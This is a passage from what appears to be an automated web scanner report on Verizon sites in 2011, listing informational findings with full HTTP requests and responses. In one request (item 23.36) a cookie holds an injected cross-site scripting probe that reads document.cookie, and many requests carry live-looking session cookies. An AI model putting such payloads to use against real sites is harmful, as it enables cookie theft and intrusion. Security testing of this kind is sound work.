<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><title="TealeafTarget.aspx"></title></head>
<body>
<hr>Re
...[SNIP]...

23.31. https://www22.verizon.com/content/verizonglobalhome/res_signin.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /content/verizonglobalhome/res_signin.aspx

Request

GET /content/verizonglobalhome/res_signin.aspx HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/?lid=//global//residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 15256
Cache-Control: private, max-age=1800
Date: Mon, 05 Sep 2011 22:19:45 GMT
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html >
<head >
<title></title>

<link rel="stylesheet" type="text/c
...[SNIP]...

23.32. https://www22.verizon.com/includes/cache/15/blank.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/cache/15/blank.html

Request

GET /includes/cache/15/blank.html HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~

Response

HTTP/1.0 200 OK
Content-Length: 0
Content-Type: text/html
Last-Modified: Fri, 07 May 2010 18:39:58 GMT
Accept-Ranges: bytes
ETag: "e8adcb114eeca1:111b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:22:04 GMT
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:27:04 GMT; path=/includes/; domain=verizon.com


23.33. https://www22.verizon.com/includes/cache/getwb31.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/cache/getwb31.asp

Request

GET /includes/cache/getwb31.asp?zip=10011 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 683
Content-Type: text/javascript
Expires: Mon, 05 Sep 2011 22:26:47 GMT
Cache-Control: Private
Date: Mon, 05 Sep 2011 22:21:47 GMT
Connection: keep-alive


rewriteHTML('scbwbnotice','');
rewriteHTML('scbwblinktext','New York,&nbsp;NY&nbsp;10011');
rewriteHTML('scbwbicon','<a href=\'http://weather.weatherbug.com/NY/New York-weather.html?zcode=z6726&zi
...[SNIP]...

23.34. https://www22.verizon.com/includes/javascript/commonjs/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/commonjs/

Request

GET /includes/javascript/commonjs/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 18981
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com


var arrHost=(window.location.hostname).split('.');
var scbCkDom='.'+arrHost[arrHost.length-2]+'.'+arrHost[arrHost.length-1];

/* detect.js */

var agt=navigator.userAgent.toLowerCase();
va
...[SNIP]...

23.35. https://www22.verizon.com/includes/javascript/oo_engine_c.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/oo_engine_c.js

Request

GET /includes/javascript/oo_engine_c.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:21:46 GMT
Content-Length: 29881
Connection: keep-alive


var OnlineOpinion=new Object();OnlineOpinion.util={SafeAddOnLoadEvent:function(func){if(!document.getElementById|!document.getElementsByTagName)return;var oldonload=window.onload;if(typeof window.
...[SNIP]...

23.36. https://www22.verizon.com/myverizon/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /myverizon/

Request

GET /myverizon/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 298
Cache-Control: private, max-age=1203
Date: Mon, 05 Sep 2011 22:41:48 GMT
Connection: keep-alive

<!-- Vignette V6 Mon Sep 05 14:01:51 2011 -->


<!-- -->
<html>
<head>
   <title>Verizon | My Verizon Login</title>
   <meta http-equiv="refresh" content="0;URL=http://www22.verizon.com/Foryourhom
...[SNIP]...

24. HTML does not specify charset
There are 53 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


24.1. http://ad.doubleclick.net/adi/N2870.vznbiz/B3160296

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2870.vznbiz/B3160296

Request

GET /adi/N2870.vznbiz/B3160296;sz=300x300;ord=782085613? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/smb_portlets/myapplication_rp/smb_orbitz.jsp
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 40948
Date: Mon, 05 Sep 2011 22:36:03 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><html>
<head>

<style type=text/css>
#orbot { width: 300px; height: 300px; bo
...[SNIP]...

24.2. http://cache.vzw.com/scripts/globalnav/blank.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.vzw.com
Path:   /scripts/globalnav/blank.html

Request

GET /scripts/globalnav/blank.html HTTP/1.1
Host: cache.vzw.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html
Cookie: V1Z2=3Xxb5cGQpT1L4o_oOLroIebqfANPB4UFu_z48jlyljwyA3Qbv3rwiCA

Response

HTTP/1.1 200 OK
Server: None
Content-Type: text/html
Last-Modified: Fri, 10 Sep 2010 20:23:52 GMT
ETag: "f-4c8a93d8"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 15
Date: Mon, 05 Sep 2011 22:14:59 GMT
Connection: close

<html></html>

24.3. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1qpxk1wfeh8v1.cloudfront.net
Path:   /tags/1234568496.html

Request

GET /tags/1234568496.html HTTP/1.1
Host: d1qpxk1wfeh8v1.cloudfront.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/?lid=//global//residential

Response

HTTP/1.0 200 OK
x-amz-id-2: B0nY08H2jpnHjn/SW41fxJTVypUCPMOogChBFehqE69xiZnUUjh9mvHcrg7qazQh
x-amz-request-id: 370753916E2BAB25
Date: Sat, 20 Aug 2011 03:01:56 GMT
x-amz-meta-s3fox-filesize: 2507
x-amz-meta-s3fox-modifiedtime: 1311270024611
Last-Modified: Thu, 21 Jul 2011 17:40:29 GMT
ETag: "6fc159b6442ca664eb0709a8e343aad7"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 2507
Server: AmazonS3
Age: 45636
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 21cfe9b1f85d28e01ed1d4ecf31011793c8e7dc0d4825f268d693e21748867c3c4fee5590cf14602
Via: 1.0 a4a33eb6d328de8565b9c9b34e7c790d.cloudfront.net:11180 (CloudFront), 1.0 3db863a26c95a97ff57e55bdbbf10793.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<html>
<head>
</head>
<body>

<!-- Insert any code or tags between here -->
<!-- "Verizon" c/o "Cadreon", segment: 'TotalTag_Verizon.com homepage' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<sc
...[SNIP]...

24.4. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571455.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1qpxk1wfeh8v1.cloudfront.net
Path:   /tags/1234571455.html

Request

GET /tags/1234571455.html HTTP/1.1
Host: d1qpxk1wfeh8v1.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/overview.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: 383mtG+vKWCru1G6cHTPDq3okRLkcpaSCR4eB7nPE2OOt4eTsLyWbJYJsNhbyKrw
x-amz-request-id: 820B35F0E6EBA1BE
Date: Fri, 26 Aug 2011 18:21:13 GMT
x-amz-meta-s3fox-filesize: 1603
x-amz-meta-s3fox-modifiedtime: 1314142890848
Last-Modified: Wed, 24 Aug 2011 20:01:20 GMT
ETag: "7f3bbce8230dcfe1e1c6b3b266c9bed8"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 1603
Server: AmazonS3
Age: 10813
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 6155803d16c8482abd205043b94b6a9de183a9c9a7596054019bb1d544e25453d8c6d93c77949fa1
Via: 1.0 db26aad8eddbf74ac3abe77abd5de63f.cloudfront.net:11180 (CloudFront), 1.0 3db863a26c95a97ff57e55bdbbf10793.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<html>
<head>
</head>
<body>

<!-- Insert any code or tags between here -->

<html>
<head>
</head>
<body>

<!-- Insert any code or tags between here -->

<!-- "Verizon Small Business" c/
...[SNIP]...

24.5. http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234571456.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1qpxk1wfeh8v1.cloudfront.net
Path:   /tags/1234571456.html

Request

GET /tags/1234571456.html HTTP/1.1
Host: d1qpxk1wfeh8v1.cloudfront.net
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/products/voice/plans.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: q9iYskpUNHXsfpxrxzNmGO1ZhlcEQ3sbjXF3FbNwhAoje/2YkDdJoGlHBNDNddhi
x-amz-request-id: 521DCA4F7060D914
Date: Thu, 25 Aug 2011 16:40:37 GMT
x-amz-meta-s3fox-filesize: 1603
x-amz-meta-s3fox-modifiedtime: 1314142878346
Last-Modified: Wed, 24 Aug 2011 20:01:21 GMT
ETag: "7f3bbce8230dcfe1e1c6b3b266c9bed8"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 1603
Server: AmazonS3
Age: 64838
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: c323e91c050b5c25a364eeb8082932bb5d3c060736379d747d4b7b8d8aea09acd436aa5976863e0b
Via: 1.0 8ff11be393de0e3f4a1ed1dda26bfcdd.cloudfront.net:11180 (CloudFront), 1.0 6788ca0114a0c4ef3becec756fad24c9.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

<html>
<head>
</head>
<body>

<!-- Insert any code or tags between here -->

<html>
<head>
